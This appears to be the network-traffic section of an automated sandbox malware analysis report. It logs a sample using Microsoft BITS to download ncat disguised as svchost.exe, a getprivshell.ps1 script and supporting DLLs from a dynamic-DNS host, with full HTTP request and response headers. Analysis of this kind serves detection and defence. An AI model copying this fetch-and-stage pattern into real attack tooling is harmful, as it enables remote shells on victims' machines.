Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
g57hitr9atw9jkky5p2.ddns.net | 66.228.37.7 |
- TCP Requests
-
-
192.168.56.102:49165 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49166 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49170 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49171 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49174 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49175 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49178 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49179 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49183 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49184 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49189 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
192.168.56.102:49190 66.228.37.7:80g57hitr9atw9jkky5p2.ddns.net
-
- UDP Requests
-
-
192.168.56.102:63709 164.124.101.2:53
-
192.168.56.102:64513 164.124.101.2:53
-
192.168.56.102:137 192.168.56.103:137
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:64516 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.102:123
-
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/svchost.exe
REQUEST
RESPONSE
BODY
HEAD /ncat/svchost.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:50 GMT
Content-type: application/x-msdos-program
Content-Length: 327312
Last-Modified: Fri, 10 Feb 2023 00:47:39 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/svchost.exe
REQUEST
RESPONSE
BODY
GET /ncat/svchost.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 10 Feb 2023 00:47:39 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:51 GMT
Content-type: application/x-msdos-program
Content-Length: 327312
Last-Modified: Fri, 10 Feb 2023 00:47:39 GMT
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/getprivshell.ps1
REQUEST
RESPONSE
BODY
HEAD /ncat/getprivshell.ps1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:52 GMT
Content-type: application/octet-stream
Content-Length: 270
Last-Modified: Fri, 10 Feb 2023 19:27:30 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/getprivshell.ps1
REQUEST
RESPONSE
BODY
GET /ncat/getprivshell.ps1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 10 Feb 2023 19:27:30 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:53 GMT
Content-type: application/octet-stream
Content-Length: 270
Last-Modified: Fri, 10 Feb 2023 19:27:30 GMT
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libssh2.dll
REQUEST
RESPONSE
BODY
HEAD /ncat/libssh2.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:53 GMT
Content-type: application/x-msdos-program
Content-Length: 197272
Last-Modified: Thu, 09 Feb 2023 20:06:35 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libssh2.dll
REQUEST
RESPONSE
BODY
GET /ncat/libssh2.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 09 Feb 2023 20:06:35 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:54 GMT
Content-type: application/x-msdos-program
Content-Length: 197272
Last-Modified: Thu, 09 Feb 2023 20:06:35 GMT
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libssl-3.dll
REQUEST
RESPONSE
BODY
HEAD /ncat/libssl-3.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:55 GMT
Content-type: application/x-msdos-program
Content-Length: 634008
Last-Modified: Thu, 09 Feb 2023 20:06:44 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libssl-3.dll
REQUEST
RESPONSE
BODY
GET /ncat/libssl-3.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 09 Feb 2023 20:06:44 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:56 GMT
Content-type: application/x-msdos-program
Content-Length: 634008
Last-Modified: Thu, 09 Feb 2023 20:06:44 GMT
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libcrypto-3.dll
REQUEST
RESPONSE
BODY
HEAD /ncat/libcrypto-3.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:58 GMT
Content-type: application/x-msdos-program
Content-Length: 3755152
Last-Modified: Thu, 09 Feb 2023 20:06:29 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/libcrypto-3.dll
REQUEST
RESPONSE
BODY
GET /ncat/libcrypto-3.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 09 Feb 2023 20:06:29 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:40:58 GMT
Content-type: application/x-msdos-program
Content-Length: 3755152
Last-Modified: Thu, 09 Feb 2023 20:06:29 GMT
HEAD
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/vcruntime140.dll
REQUEST
RESPONSE
BODY
HEAD /ncat/vcruntime140.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:41:01 GMT
Content-type: application/x-msdos-program
Content-Length: 76152
Last-Modified: Wed, 08 Mar 2023 00:35:44 GMT
GET
200
http://g57hitr9atw9jkky5p2.ddns.net/ncat/vcruntime140.dll
REQUEST
RESPONSE
BODY
GET /ncat/vcruntime140.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Wed, 08 Mar 2023 00:35:44 GMT
User-Agent: Microsoft BITS/7.5
Host: g57hitr9atw9jkky5p2.ddns.net
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 24 Mar 2023 00:41:01 GMT
Content-type: application/x-msdos-program
Content-Length: 76152
Last-Modified: Wed, 08 Mar 2023 00:35:44 GMT
ICMP traffic
No ICMP traffic performed.
IRC traffic
Command | Params | Type |
---|---|---|
CONNECT | %s HTTP/1.0 | client |
CONNECT | to %s:%d. | client |
CONNECT | %s:%d HTTP/1.1 | client |
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts